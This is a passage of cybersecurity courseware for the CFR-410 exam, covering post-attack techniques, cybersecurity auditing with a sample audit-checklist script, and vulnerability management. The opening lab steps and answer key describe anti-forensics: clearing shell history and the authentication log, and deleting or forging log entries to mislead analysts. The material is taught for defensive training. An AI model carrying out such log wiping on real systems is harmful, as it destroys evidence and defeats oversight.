   in memory, including the ones you just entered, back to ~/.zsh_history.
d) Close the terminal.
e) From the Kali Linux desktop, select the Log Out icon on the top-right panel.
f) From the Log out Kali screen, select Log Out.
g) Log back into Kali Linux, then open a terminal.
h) Enter history to verify that it's empty.

Instructor note: Consider having students open the Authentication log file to verify that it has actually
been cleared. Because clearing the Authentication log requires superuser privileges, it will not be
completely empty, since it records when the root user is signed out after the command finishes.

5. What other methods could an attacker use to cover their tracks?
   A: Answers may vary, but they could delete individual entries of an event log rather than the entire
   log. This may arouse less suspicion, but will typically take more time and finesse to identify each
   and every relevant entry. The attacker may also forge log entries rather than delete any of them to
   misdirect a forensic analyst.

Summary
In this lesson, you analyzed the last phase of the attack process: the post-attack phase. You assessed
how attackers can remain in control of your network and systems even after the main attack has
been launched, and even after the incident response team thinks it has contained the situation. You
also assessed how attackers remain stealthy and evade detection so they can continue to exploit the
organization without its knowledge. Lastly, attackers will attempt to thwart the forensic process to
remain unidentified, and you assessed what tools and techniques they use to accomplish this. Being
able to detect and analyze post-attack processes is an often overlooked, yet crucial, skill for the
cybersecurity practitioner to have.

Has your organization or an organization you're familiar with blocked or otherwise restricted
services that may be used in a C&C operation? If so, which ones, and why? If not, do you think
it's a good idea to restrict any of these services?

A: Answers will vary. Organizations may have blocked IRC in the network, as this is the most well-known
vector for C&C operations, and most organizations have no use for this chat protocol. Other
organizations may have blocked ICMP and P2P networks for reasons other than C&C, and may see
the blocks as being an added benefit in light of C&C threats. Students whose organizations don't
block any particular services to mitigate C&C may have done so deliberately; the organization could
use particular services like social media sites and cloud repositories extensively. They may not be
able to restrict these channels without disrupting operations.

What types of lateral movement or pivoting techniques are you most concerned about in your
organization, and why?

A: Answers will vary. Some students may see the golden ticket attack as particularly devastating because
of how an attacker can move to domain controllers and essentially compromise the entire
organizational forest. Others may see pivoting as a major threat because of how quickly and, in some
cases, easily, an attacker can use a single compromised host to spread through the network.
Students whose internal hosts routinely use remote access services may be wary of how an attacker
can use these services to move laterally from host to host. Even hosts without any overt remote
access services enabled can still be the victims of such an attack.

Encourage students to use the social networking tools provided on the CHOICE Course screen to
follow up with their peers after the course is completed for further discussion and resources to
support continued learning.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
Lesson 5: Analyzing Post-Attack Techniques |

6 Assessing the Organization's Security Posture

Lesson Time: 4 hours

Lesson Introduction
Now that you've analyzed the threats to your organization and their attack process, you can
assess just how prepared your current security posture is to defend against these threats. The
assessment process includes multiple methods and tools that will assist you in identifying
weak points in the organization. More importantly, assessment will reveal how to correct
these weaknesses and mitigate risk in the organization.

Lesson Objectives

In this lesson, you will:

• Implement cybersecurity auditing processes.
• Implement a vulnerability management plan.
• Assess vulnerabilities in the organization.
• Conduct authorized penetration tests to evaluate the organization's security posture.


TOPIC A
Implement Cybersecurity Auditing
The first assessment technique you'll focus on is auditing. Through an auditing program, the
organization can ensure its cybersecurity efforts are in compliance with all relevant laws, regulations,
and policies.

Cybersecurity Auditing
Earlier, auditing was defined as an evaluation of the organization's adherence to established and
relevant policies, regulations, and laws that govern cybersecurity. An audit might assess the
governance practices themselves, but more commonly, an audit is conducted to determine whether
or not the organization is in compliance with existing governance practices, and if so, to what
degree. The objects under review include everything from the technical implementation of security
software to the execution of business plans that support security—anything that affects or is
affected by cybersecurity governance.
Audits can be performed by many different kinds of personnel. An auditor can be internal to the
organization, reviewing cybersecurity against organizational policy, or the auditor can be external,
reviewing cybersecurity against industry or legal obligations. Organizations can also enlist external
auditors to perform an assessment of organizational policy if no internal auditors are available.
However, regulatory audits are always performed by independent parties—typically under the
auspices of a government agency—in order to avoid a conflict of interest.
Cybersecurity auditing is a repeatable process of evaluating the organization's security posture.
Regulatory agencies mandate audits at a pace defined by the regulation, whereas the pace of internal
audits is up to the organization itself. Risk-averse organizations with adequate funding will likely
perform audits on a quarterly basis, whereas other organizations should perform audits at least
annually, but preferably semi-annually.

Like most processes, auditing can be conceptualized as a series of steps:

1. Define audit objectives. What are your overall objectives in the audit, and how will you track
them?
2. Prepare for the audit. Identify your criteria for success and determine the optimal tools and
techniques to move forward with the audit.
3. Conduct the audit. Monitor, assess, and evaluate the elements that you identified as being
crucial to meeting the audit's objectives, and document your findings as you go.
4. Finalize the audit and share results. Communicate your findings to the appropriate audiences,
while also suggesting remediation actions to fill in any gaps you identified in the audit.

Figure 6-1: The cybersecurity auditing process.

Lesson 6: Assessing the Organization's Security Posture | Topic A


Policies and Procedures Used in Auditing

An organizational audit can refer to many different policies and procedures that outline
cybersecurity requirements and guide their implementation. Essentially, any governing or operational
document that has some relevance to cybersecurity can be useful to the auditor. Common examples
of policies useful to an audit include:
• Acceptable use policy (AUP) to ensure that users are using organizational resources as expected.
• Password policy to ensure users are choosing strong passwords, and that system administrators
are implementing the proper restrictions to enforce strong passwords.
• Remote access and VPN policy to ensure that employees who work from home or on the road
are not putting the network at unnecessary risk of intrusion.
• Data security policy to ensure data is being stored, retained, and destroyed according to a clearly
defined lifecycle.
• Personal data handling policy to ensure the organization is keeping PII private.
• Communication policy to ensure sensitive information flows from authorized user to authorized
user and does not leak out to a wider audience.
Some examples of procedures useful to an audit include:
• Patching procedures to ensure software is being correctly updated to fixed versions without
disrupting critical services.
• Control testing procedures to ensure the effectiveness of security countermeasures is being
periodically reviewed.
• Intelligence collection procedures to ensure the most useful and actionable data is being collected
about potential threats, and that irrelevant data ("noise") is avoided.
• Incident response procedures to ensure first responders are working as a team to quickly and
successfully mitigate the effects of an incident.
• Evidence collection and handling procedures to ensure forensic investigators are not
contaminating or otherwise improperly handling evidence.

Objectives of an Audit

One important component of developing an auditing policy is clearly outlining what you hope to
accomplish in the audit. Each organization is going to have its own set of objectives that pertain to
its unique operational practices and ways of doing business. An auditor will need to consider many
different factors when determining these objectives, including:
• The organization's size, e.g., number of employees and overall market value.
• The organization's workforce, particularly how and where employees perform their daily duties.
• The organization's business goals, like marketing new products and services.
• The organization's past history of cybersecurity incidents, particularly if it has fallen prey to data
breaches.
• The organization's legal obligations.
• And many more.

Even though each organization's audit objectives are tailored to that organization's needs, there are
some objectives common to most audits, including:

• Ensure all aspects of the business are in compliance with the relevant internal and external
requirements.
• Identify gaps where software and hardware resources are not meeting baseline expectations.
• Identify gaps where security technologies are not meeting baseline expectations.
• Identify gaps where business operations are not meeting baseline expectations.
• Determine whether or not security training and awareness campaigns are effective.
• Verify that backups of critical data are being taken and properly managed according to
requirements.
• Ensure that facilities and premises are adequately implementing protection against physical
intrusion.
• And many more.


Compliance Audit
Although an auditor is unlikely to be called on to audit legal and regulatory compliance for their own
organization, some independent auditors are contracted by government agencies and/or industry
watchdogs to perform such audits. If you're in this role, you need to be aware of what is expected of
you from both the entity that commissioned the audit and the subject of that audit. Of course, this
will depend on the compliance standards you're auditing the organization against, as well as the
organizational factors mentioned earlier.
Likewise, as a security practitioner in an organization subject to compliance audits, you need to be
prepared to facilitate the audit as best you can. This means being proactive about compliance,
ensuring you have a plan in place to follow all applicable laws and regulations in your daily activities.
As part of a compliance audit, you must be able to identify all sources of compliance that are
relevant to the organization under audit. Examples of sources of compliance that are relevant to
cybersecurity include the following.

Most of these compliance sources were discussed in the beginning of the course, so they should look
familiar to students.

Type of Compliance: Data privacy
Description and Example Sources: Privacy compliance sources focus on ensuring that users' personal
information cannot be accessed or modified by unauthorized parties. Examples include:
• HIPAA, which has requirements for how the personal health data (PHI) of U.S. citizens must be
handled.
• GDPR, which has requirements for how the personal data of EU citizens must be handled.
• PCI DSS, which has requirements for how cardholder data must be handled.

Type of Compliance: Organizational cybersecurity
Description and Example Sources: Cybersecurity compliance sources focus primarily on ensuring
organizations are implementing best practices for security, particularly the protection of data and
networks against intrusion and compromise. Examples include:
• PCI DSS, which has requirements for cybersecurity practices in organizations that handle
cardholder data.
• SOX, which has requirements for financial recordkeeping and reporting for publicly traded U.S.
organizations that meet a certain market value threshold.

Type of Compliance: Public sector
Description and Example Sources: Public sector compliance sources apply directly to government
agencies or contractors who work with government agencies. Examples include:
• FISMA, which has requirements for cybersecurity practices in U.S. federal agencies.
• CMMC, which certifies that DoD contractors meet cybersecurity requirements set forth by an
accreditation board of cybersecurity professionals.

Type of Compliance: Environment, health, and safety (EHS)
Description and Example Sources: EHS compliance applies to any organization, not just
organizations in sectors typically associated with these three aspects. Organizations must ensure the
well-being of their employees and take steps to minimize harm done to the environment and the
safety of the public at large. Examples include:
• Occupational Safety and Health Act (OSHA), which has requirements for ensuring the health and
safety of personnel in both public and private sectors of the U.S.
• Health and Safety at Work Act, which has requirements for ensuring the health and safety of
personnel in both public and private sectors of the UK.

Type of Compliance: Non-regulatory
Description and Example Sources: Some compliance auditing involves non-regulatory standards and
frameworks common to an industry. Members of the industry who agree to adhere to these
standards and frameworks, as well as those seeking certification, must still prove compliance.
Examples in the world of cybersecurity include:
• ISO/IEC 27001, which has requirements for information assurance that organizations may
choose to seek certification for. Certification is performed by third parties, not by ISO itself.
• COBIT, which has requirements for IT management and governance that organizations may
choose to seek certification for. ISACA performs its own certification for COBIT.
• PCI DSS, which is not legally binding.

Type of Compliance: Insurance
Description and Example Sources: More and more companies are taking out cybersecurity insurance
policies to transfer some or most of the organization's risk onto a third party. These third-party
insurance providers usually require that the insuree is meeting some baseline level of cybersecurity
protection. An insurer might define its own requirements, but more commonly they will expect the
insuree to comply with industry standards like ISO/IEC 27001 and COBIT.


Asset Identification

One of the most crucial aspects of any audit is identifying assets subjected to the audit. If you
developed a useful set of audit objectives, you should be able to more effectively perform asset
identification. For example, if one of your objectives is to identify flaws in network intrusion
detection systems, it logically follows that any hardware or software systems that implement network
intrusion detection will be assets to cover in the audit.
An organization that's adequately prepared for an audit will plan ahead and inventory their assets,
like a database that contains the serial numbers of all laptops provisioned to employees. This makes
asset identification much easier, as everything you need will already have been documented,
including "where" those assets are (i.e., either physically or logically on the network).
You won't always be so lucky, however. If assets are not thoroughly documented beforehand, you
may need to scan the network for relevant hosts, or actually look for those hosts on the premises.
Also, some assets are not fixed objects that you can necessarily "find," but rather abstractions that
are nonetheless crucial to the audit. For example, the structure of the network can reveal a great deal
about your organization's security posture, but you may need to map that structure yourself using a
tool like Nmap.
There are so many potential types of assets there's not much point in listing examples. Basically,
anything that implements security, is affected by security systems, can be targeted by an attack, or
that has any kind of value to the organization, should be considered an asset as part of an audit. Asset
identification can seem like an arduous process, especially in large organizations, but there are plenty
of asset management platforms that can help automate and streamline the process. Also keep in
mind that focused audits (e.g., audits assessing compliance to only one specific policy) may not
require the organization's entire set of assets, just a small subset.


ib
Audit Results Documentation

The final phase of the audit process is to communicate the results you've been documenting as you
go through the audit. Most auditors have checklists on hand that they refer back to throughout the
process. The checklist might literally present questions that the auditor checks "Yes" or "No" to
(e.g., "Is remote access turned off for the Administrator account on the domain controller?"); it
might present a scenario the auditor has to score on a sliding scale (e.g., "From 1 to 5, how secure is
the customer records database from unauthorized access?"); it might ask open-ended questions with
spaces for open-ended answers (e.g., "Does the cloud vendor apply adequate encryption to all
network traffic?"); and so on.
Whatever form the documentation takes, you must ensure it records useful information and is
tailored to your unique objectives and assets.

Figure 6-2: An example of an audit checklist.

Audit Tools
Aside from manual auditing tasks like reviewing a checklist, there are also tools that can help
automate the auditing process. These tools, typically referred to as audit management solutions, have
several benefits as compared to manual auditing. They can:
• Save the auditor a great deal of time.
• Be more effective at gathering the required information.

• Increase the accuracy of an audit, eliminating errors, duplicates, and ambiguous data.
• Generate more robust documentation of audit findings.
• More easily integrate with a large number of target systems that have differing requirements.
Most robust audit management software includes components such as:
• A user interface.
• Compliance templates and checklists.
• Schedules with which to run auditing tasks at a chosen frequency.
• Automated suggestions in the event of non-compliance.
• Reporting capabilities, such as summarizing compliance levels through text and visuals.
• Support for different documentation formats to enhance interoperability.
• Cloud synchronization so that audit information is centralized and easily accessible.

Figure 6-3: An audit management software dashboard.

Examples of Auditing Tools

Some common examples of auditing tools include:

• ManageEngine ADAudit Plus—a proprietary suite for auditing all aspects of an Active Directory
environment.
• Secureframe—a proprietary solution for auditing compliance using the System and Organization
Controls (SOC) type 2 framework for reporting. SOC was developed by the American Institute
of Certified Public Accountants (AICPA) and is used by CPAs to conduct independent audits
related to cybersecurity and privacy.
• Gensuite—a cloud-based proprietary solution for auditing against a wide range of standards and
regulations, including NIST 800-53, ISO/IEC 27001, PCI DSS, HIPAA, and more.
• Open-AudIT—an open source web-based solution for auditing system configurations across
Windows and Linux environments.

Audit Results Communication

Like any other process where you need to share your findings, you should make sure you're
communicating with authorized audiences. When it comes to an internal audit, an auditor will
typically share the results with their manager, the CISO, or another key decision maker in the
organization. The format of this communication can take several forms, including:
• A written report the audience can easily read on their own time.
• A slide presentation, which provides an opportunity to use visuals to communicate your
message, as well as an opportunity for your audience to ask questions in real time.
• An interactive website the audience can browse at their own pace.
None of these options are necessarily better than the others; it all comes down to your own comfort
level and available time, as well as how your audience prefers to receive the results.

Regardless of the format, there are some universal best practices to consider when drafting an audit
report:
• Don't drown your audience in a sea of numbers. Adapt the presentation for different
audiences you must address, including only information relevant to that audience, avoiding
jargon, and explaining things in a way the audience will understand.
• Avoid suspense. A good presentation flows well and tells a story, but not in the way a mystery
novel tells a story. You will likely provide your audience with a lot of information to process, and
they will have questions and concerns. Help them understand and buy into your conclusions by
anticipating the types of questions you think they will have, and sharing important points early
on.
• Provide context for details. If you must tunnel down into details showing numbers, tables, and
charts, be sure to connect them back to the main idea or point you're trying to communicate.
• Be honest and transparent. Be clear regarding how you obtained results. Don't hide significant
data or results—even if they don't fully support your objectives or proposed solution.
• Check your work. The quality of your findings may be called into question if your presentations
contain errors.
• Invite feedback. Make sure your audience has a chance to ask questions so you can provide
clarification and promote buy-in.
• Provide solutions, not just problems. Although an audit report should obviously mention gaps
in security and other compliance shortcomings, an audit is not helpful unless it also provides
suggestions for remediating these issues.

Guidelines for Implementing Cybersecurity Auditing

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
CHOICE Course screen.

Follow these guidelines when implementing cybersecurity auditing.

Implement Cybersecurity Auditing

When implementing cybersecurity auditing:

• Follow a repeatable process for auditing—define objectives, prepare, conduct, and finalize the
audit.
• Conduct an internal audit at least annually, preferably semi-annually.
• Identify and consult various cybersecurity policies and procedures in your organization during an
audit.
• Weigh various factors when determining the proper objectives of an audit, such as the
organization's size and business goals.
• Consider how you might need to work with an external auditor in a compliance audit.
• Consider how you might need to work with another organization if you're an independent
compliance auditor.
• Ensure you have an asset inventory system in place before conducting an audit.
• Document results using a customized checklist as you conduct the audit.
• Identify the authorized audience to communicate your audit findings to.
• Determine the proper format with which to present your audit findings.
• Keep in mind general best practices for presenting results to an audience.


ACTIVITY 6-1
Conducting a Cybersecurity Audit

Data File

C:\CNX0013Data\Assessing the Organization's Security Posture\audit_form.zip

Before You Begin
You will be using your Windows Server machine for this activity. The XAMPP web server should
still be running.

Scenario

Develetech is required to perform routine audits of its critical server infrastructure. As part of this
audit, you'll review some of the security settings on your Windows Server and the Active Directory
domain policies it enforces, and compare them to the organization's baseline security policy
requirements.
In addition to the logical security of the server, you'll also audit its physical security. The server is
located in a large server room near some offices. The only entrance to the server room is a door that
requires key card access. Each key card is assigned to an authorized administrator so entry into the
room can be controlled and logged. The lighting in the room is always on so that administrators
don't have to remember to turn the lights on and off when they enter and exit. The server itself sits
on a shelf so that it can be easily moved to make room for new equipment.
To conduct the audit, you'll fill out a simple form that will help you keep track of successes and
failures in the audit. When you're done with the audit, you'll present your findings to management so
any problems you identified can be fixed.

Be prepared to help students answer the audit questions.

1. Set up the audit form page on the server and navigate to it.
a) From the data files, right-click audit_form.zip and select Extract All.
b) In the Files will be extracted to this folder text box, type C:\xampp\htdocs
c) Select Extract and replace all files when prompted.
d) Open a new web browser tab and navigate to http://localhost:80/audit.php.
e) Verify that you are on the Windows Server Audit Checklist page.

2. Fill out the Domain Password Policy section of the form.

a) Read each question.
b) Open a PowerShell window and enter Get-ADDefaultDomainPasswordPolicy
c) Examine the results.
d) Using the results, select either Yes or No to answer each question.
e) When you're done, close PowerShell.

3. Fill out the Local Security Policy section of the form.
a) Read each question.
b) From Server Manager, select Tools→Local Security Policy.

c) In the Local Security Policy window, from the console tree, select Security Settings→Local
Policies→Security Options.
d) Using the list of policies, select either Yes or No to answer each question.
The relevant policies are, respectively:
• Accounts: Block Microsoft accounts
• Accounts: Guest account status
• Devices: Prevent users from installing printer drivers
• Shutdown: Allow system to be shut down without having to log on
• User Account Control: Detect application installations and prompt for elevation
e) Close the Local Security Policy window when you're done.

4. Fill out the Physical Security section of the form.
a) Read each question.
b) Use the activity scenario to determine the answers to the audit questions.
c) Select either Yes or No to answer each question.

5. Obtain the results of the audit.


a) Select Submit.
b) Verify the number of audit successes and failures.

c) Verify the final audit score.

6. What are some of the audit failures you encountered?

A: The server should have failed the following audit questions: 1.1, 1.2, 1.3, 2.1, 3.4, and 3.5. Most of
the failures center on the domain password policy and the server's physical security, with one
failure in the local security policy.

7. How might you communicate these audit results to a manager or other decision maker?
A: Answers may vary, but you can tell your audience the server is failing to meet the password
requirements set out by company policy, and that these issues should be corrected in the domain
policy and then pushed out across the domain. You can also suggest that Microsoft accounts be
explicitly prevented from logging on to the server to correct the one local security policy failure.
From a physical security standpoint, although being able to move the server around is more
convenient, the administrators should securely fasten the server to the shelf or some other surface
to prevent it from being carried out. If they need to make room for new equipment, they should
better plan where to place existing equipment and the new equipment. Lastly, you should suggest
that the company install automatic lights so the lights turn on when administrators enter the room
and turn off when they exit. That way, passersby can't see into the room when no one's around.

8. Close the browser.
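The checklist described under Audit Results Documentation and scored by the audit form in this activity can also be kept as code, so that the Yes/No answers that come from machine settings are derived from exported evidence rather than read off a screen. The script below is an added example; it is not code from the course or from its audit_form data files. The evidence JSON is constructed: the "domain" section reuses the property names returned by Get-ADDefaultDomainPasswordPolicy (assumed exported with ConvertTo-Json, with MaxPasswordAge flattened to whole days), the "local" section uses policy names from step 3, and the "physical" section holds answers entered by hand from the scenario. The baseline values, the item IDs, and the pass conditions are assumptions, not Develetech's actual policy.

```python
"""Score a Windows Server audit checklist from exported evidence.
Added example, not part of the course or its audit_form data files. The
evidence, baseline values, item IDs, and pass conditions are constructed
assumptions; the "domain" keys mirror Get-ADDefaultDomainPasswordPolicy."""
import json
from dataclasses import dataclass
from typing import Callable, List

# Assumed organizational baseline (hypothetical, not Develetech's real policy).
BASELINE = {"min_length": 12, "history": 24, "max_age_days": 90}

# Constructed evidence snapshot: weak domain password settings plus physical gaps.
EVIDENCE_JSON = """
{
  "domain": {
    "ComplexityEnabled": false,
    "MaxPasswordAgeDays": 0,
    "MinPasswordLength": 5,
    "PasswordHistoryCount": 3,
    "ReversibleEncryptionEnabled": false
  },
  "local": {
    "Accounts: Block Microsoft accounts": "This policy is disabled",
    "Shutdown: Allow system to be shut down without having to log on": "Disabled"
  },
  "physical": {
    "Key card entries are logged": true,
    "Server is fastened to its rack or shelf": false,
    "Lights turn off when the room is unattended": false
  }
}
"""


@dataclass(frozen=True)
class CheckItem:
    item_id: str
    question: str
    passes: Callable[[dict], bool]  # derives the Yes/No answer from the evidence


@dataclass
class AuditResult:
    passed: List[str]
    failed: List[str]

    @property
    def score(self) -> float:
        """Percentage of items answered Yes, rounded to one decimal place."""
        total = len(self.passed) + len(self.failed)
        return round(100.0 * len(self.passed) / total, 1) if total else 0.0


def manual(question: str) -> Callable[[dict], bool]:
    # Answer recorded by hand in the "physical" section; absent means No.
    return lambda ev: bool(ev["physical"].get(question, False))


SHUTDOWN = "Shutdown: Allow system to be shut down without having to log on"
CHECKLIST: List[CheckItem] = [
    CheckItem("DPP-1", "Minimum password length meets baseline",
              lambda ev: ev["domain"]["MinPasswordLength"] >= BASELINE["min_length"]),
    CheckItem("DPP-2", "Password complexity is enforced",
              lambda ev: ev["domain"]["ComplexityEnabled"] is True),
    CheckItem("DPP-3", "Password history meets baseline",
              lambda ev: ev["domain"]["PasswordHistoryCount"] >= BASELINE["history"]),
    CheckItem("DPP-4", "Maximum password age is set and within baseline",
              lambda ev: 0 < ev["domain"]["MaxPasswordAgeDays"] <= BASELINE["max_age_days"]),
    CheckItem("DPP-5", "Reversible encryption is disabled",
              lambda ev: ev["domain"]["ReversibleEncryptionEnabled"] is False),
    CheckItem("LSP-1", "Microsoft accounts cannot log on to the server",
              lambda ev: ev["local"]["Accounts: Block Microsoft accounts"]
              == "Users can't add or log on with Microsoft accounts"),
    CheckItem("LSP-2", "Shutdown without logon is not allowed",
              lambda ev: ev["local"][SHUTDOWN] == "Disabled"),
    CheckItem("PHY-1", "Key card entries are logged",
              manual("Key card entries are logged")),
    CheckItem("PHY-2", "Server is fastened to its rack or shelf",
              manual("Server is fastened to its rack or shelf")),
    CheckItem("PHY-3", "Lights turn off when the room is unattended",
              manual("Lights turn off when the room is unattended")),
]


def run_audit(evidence: dict, checklist: List[CheckItem] = CHECKLIST) -> AuditResult:
    """Answer every item. Missing or malformed evidence counts as a failure
    instead of aborting, so the gap still shows up in the report."""
    result = AuditResult(passed=[], failed=[])
    for item in checklist:
        try:
            ok = bool(item.passes(evidence))
        except (KeyError, TypeError):
            ok = False
        (result.passed if ok else result.failed).append(item.item_id)
    return result


def audit_from_json(text: str = EVIDENCE_JSON) -> AuditResult:
    return run_audit(json.loads(text))


if __name__ == "__main__":
    r = audit_from_json()
    print(f"Passed {len(r.passed)}, failed {len(r.failed)}, score {r.score}%")
    print("Failed items:", ", ".join(r.failed))
```

Treating missing evidence as a failure rather than an error matters in practice: an item the auditor could not gather evidence for is a finding to report, not a reason to skip the item, and it keeps the final score honest when an export is incomplete.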


TOPIC B
Implement a Vulnerability Management Plan
Before you start evaluating your organization for flaws, you need to formulate a plan. This will
ensure that you're well-prepared to manage vulnerabilities, no matter the circumstances.

Vulnerability Management

The methodical process of discovering, analyzing, and controlling every vulnerability associated with
unacceptable risks is called vulnerability management.
Certain vulnerabilities related to your organization's information systems put your organization at
risk for various compliance- and security-related issues. Through your risk management processes,
you can identify some security- and compliance-related risks that you can accept or transfer, and
others that you need to reduce or avoid.
By thoroughly examining your systems through vulnerability assessments and penetration testing,
you can identify sources of vulnerability to those risks that you need to reduce or avoid. This
essentially produces a to-do list of flaws in your systems you need to remediate. Identifying and
implementing specific corrections for each vulnerability enables you to harden your systems to
reduce or avoid your organization's risk. Once you have implemented a defensive system
configuration, you should also continually monitor, test, and adjust it to ensure the necessary
configuration continues to remain in place and continues to be effective over time.

The Vulnerability Management Process

There are several general steps in the vulnerability management process.

Step: 1. Inventory
Description: Identify all systems that exist within the area you plan to manage. Identify and
document the operating system platforms and functions associated with each system, and identify
any unauthorized or unmanaged systems.

Step: 2. Identify requirements
Description: Identify any organizational, regulatory, or legal compliance requirements your systems
are subject to.

Step: 3. Identify and assess vulnerabilities and exposures
Description: Ensure that you and your assessment tools are approved to scan the systems and
information you've identified. Use vulnerability scanners and other tools to identify vulnerabilities
and other ways your systems may be exposed to security issues.

Step: 4. Report on results
Description: Generate reports from vulnerability assessments and deliver these reports to the
appropriate stakeholders.

Step: 5. Remediate
Description: Apply corrective measures for any vulnerabilities that represent unacceptable risks,
guided by your current risk management criteria for security and compliance. Assess vulnerabilities
again to verify you have corrected them as intended.

Step: 6. Implement continuous monitoring
Description: Create a program for continuously monitoring assets for vulnerability information.

Note: Steps 5 and 6 are sometimes referred to as "post-assessment" tasks, as they are conducted
after the assessment proper.

Lesson 6: Assessing the Organization's Security Posture | Topic B


CyberSec First Responder® (Exam CFR-410) | 231

Requirements Identification

Before you can generate a baseline of acceptable configurations and behavior for your systems,
you'll likely have several different requirements these systems need to meet. These requirements can
come from within the organization or from without; in either case, you need to identify exactly
what risks your systems must avoid to fulfill these requirements. Once you've identified these
requirements, you can conduct your vulnerability management tasks with them in mind, so your
management program accounts for the most crucial vulnerabilities and provides the most efficient
response if vulnerabilities are discovered.

Requirements come from a variety of sources, including:

• Asset inventory: You don't just inventory your assets to know what to assess, you also do so to
identify how to assess them. This is because not all assets are of equal importance to the
organization, nor does each asset present the same level of underlying risk. You may choose to
define assets in terms of being critical or non-critical to the survival of the business; the former
will likely require more scrutiny than the latter. The nature of an asset will also determine the
tools you use to detect and manage its vulnerabilities.
• Regulatory environments: Your organization is likely subject to several technical regulations,
which vary by industry and by the nature of the organization's business operations. These
regulations often concern what types of data you can store, and how you must protect that data
from unauthorized access. Your vulnerability management plan needs to incorporate external
compliance requirements into its baseline so the network and systems in the organization are not
bringing about the risk of legal action.
• Corporate policy: To secure the business against risk, your organization will most likely have
one or more policies that dictate its expectations, like an acceptable use policy. These policies are
a necessary reference in any vulnerability management program, because security personnel
cannot assess and remediate vulnerabilities unless they know what risks the organization is
willing to accept, and what risks it is not. What's more, the vulnerability management program
must operate within time and budget constraints, both of which are affected by policy
requirements.
• Data classification: This is a major component of many corporate policies, as it enables the
organization to correctly assess the business value of the information it stores and transmits.
Similar to taking inventory of physical assets, classifying data as sensitive versus non-sensitive
helps the vulnerability management program determine how vulnerabilities in data handling
should be identified and remediated.

Execution and Report Generation

The part of your vulnerability management plan that deals with executing scans and other
assessments should answer various questions, including:
• Who will conduct the scan(s)?
• When will the assessor conduct the scan(s)?
• What systems will the assessor scan?
• What impact will these scan(s) have on these systems?
• Do these systems need to be isolated during the scan(s), or can the systems remain in
production?
• Who can the assessor contact if they need assistance?

The majority of scanning tools will generate a summary report of all vulnerabilities discovered
during the scan directly after execution completes. These reports tend to color-code vulnerabilities
in terms of their criticality, with red typically denoting a weakness that requires immediate attention.
Other tools assign scores to each vulnerability using their own metrics or using other industry-
recognized metrics. Useful reports also go into specific detail about different categories of
vulnerabilities and how the scanned system does or does not exhibit flaws with regard to these
categories.

You can typically save reports to a file for easy distribution to the relevant audiences. Some tools can
be configured to distribute reports automatically to a set of predefined email addresses. You may
opt to distribute reports manually if the results require you to carefully explain important
context during a meeting with stakeholders, lest the results be misinterpreted. This can also prevent
sensitive vulnerability information from being sent to the wrong people.

Figure 6-4: Part of a post-scan report.
e
Plans of Action

In both vulnerability management and auditing, it's a good idea to have a plan in place for
addressing issues found during the assessment. This will ensure that you aren't scrambling to figure
out what to do in an emergency. As you develop a plan of action, consider the following key
components:
• Review the assessment results. The plan of action should guide how regularly you review the
results, as well as stipulate what special circumstances warrant an immediate review.
• Focus on critical issues requiring action. During the review, you should triage any issues you
find, focusing on the ones most critical to the organization. The actions you apply to critical
issues will take priority.
• Identify appropriate remediation actions. Obviously, you need to figure out what the best
courses of action are to address the issues you discovered. It's not feasible to apply every possible
fix to every issue, so you'll likely need to conduct a cost–benefit analysis to determine the most
appropriate fixes.
• Specify success criteria. The plan should define what success means as far as taking action to
address issues. For example, does success mean the risk of a vulnerability is mitigated entirely, or
is avoiding the risk enough?
• Determine monitoring procedures. The plan also needs to account for how to monitor any
remediation actions you take to ensure they are working as intended. You might soon follow up
with another assessment to see if the vulnerability is still present, for example.

POA&M
The DoD supports a similar concept known as a plan of action and milestones (POA&M). As
defined in NIST SP 800-37r2, POA&M is about identifying risk mitigation tasks and the resources
needed to accomplish those tasks. It also outlines milestones in meeting these tasks, as well as
schedules for those milestones. Likewise, the POA&M anticipates any risk mitigation tasks that
cannot be implemented immediately due to several factors, such as the necessary resources for the
task being unavailable.

Remediation

Reports generated by a vulnerability assessment may offer suggestions as to how to fix any detected
security issues. Even if they don't, you'll likely need to put any vulnerabilities through the process of
remediation. Remediation is not just a simple process of applying a quick fix; it's a comprehensive
approach to managing the risk that vulnerabilities present to the organization. Ultimately, the goal of
remediation is to move the organization as close as possible to reaching a level of acceptable risk for
a given situation.

One of the most important preliminary steps in the remediation process is to prioritize your efforts.
There are several factors that can affect which problems you choose to tackle and in what order,
including how critical the affected system or information is, and how difficult it is to implement the
remediation. Having a plan for prioritization will enable you to focus on the most important targets,
and consequently reduce risk as much as possible.

Other than prioritization, another important step in the remediation process is planning for change
control implementation. A change control system may already be in place to manage how changes
are applied, whether security related or otherwise. You need to ensure you communicate your
remediation efforts with personnel who oversee change control so the process goes smoothly. In
some cases, you may need to demonstrate your suggested changes will have a minimal impact on
operations and will actually fix what they claim to. By conducting sandbox tests on your suggested
changes, the organization can be more confident about pushing this remediation to production
systems.

Validation

After you've implemented your remediation techniques, you need a way to validate the intended
actions were taken and had the intended effect. Regular audits you or an external party conducts will
typically catch any gaps in your remediation. However, it may be too late by the time this happens,
and any issues with your remediation efforts may go undetected and uncorrected for longer than
you can tolerate. That's why you should consider incorporating a validation phase at the end of your
remediation process, so you can quickly confirm a particular vulnerability has been fixed and is
not continuing to bring risk to the organization.
up

Remediation Inhibitors

You should be aware there are plenty of inhibitors to the remediation process. These obstacles can
undermine your ability to deal with vulnerabilities in the most ideal way possible, and in some cases,
may make it impossible to remediate the problem. For example:
• The suggested remediation method may lead to a necessary business process interruption. In
some cases, this type of interruption is deemed too much of a risk to the business's operations.
Or, the interruption is at least enough of a risk that the remediation, if successful, is not worth
implementing.
• The remediation may lead to a degradation of functionality in a particular component. This is
often the case with systems flawed by design, that is, those that failed to incorporate security as a
fundamental element of the design process. These systems may not be able to operate as desired
if security restrictions are placed on them.
• Organizational governance may make it difficult for security personnel to implement remediation
if higher-level decision makers do not sign off on the fixes. They may not understand the
importance of remediating the affected component or they may decide that the suggested
remediation is not worth the time and expense.
• The suggested remediation may be too resource intensive, or may require resources beyond the
organization's reach. There are many other resource-related implications brought about by your
remediation efforts that you need to identify, though you won't always be able to overcome these
challenges.
• Business documents like memoranda of understanding (MOU) and service-level agreements
(SLA) can limit the security team's ability to remediate vulnerabilities. General consumers and
business customers expect a certain level of functionality in the products they purchase, and if
the organization implements a fix that negatively impacts this functionality, the organization
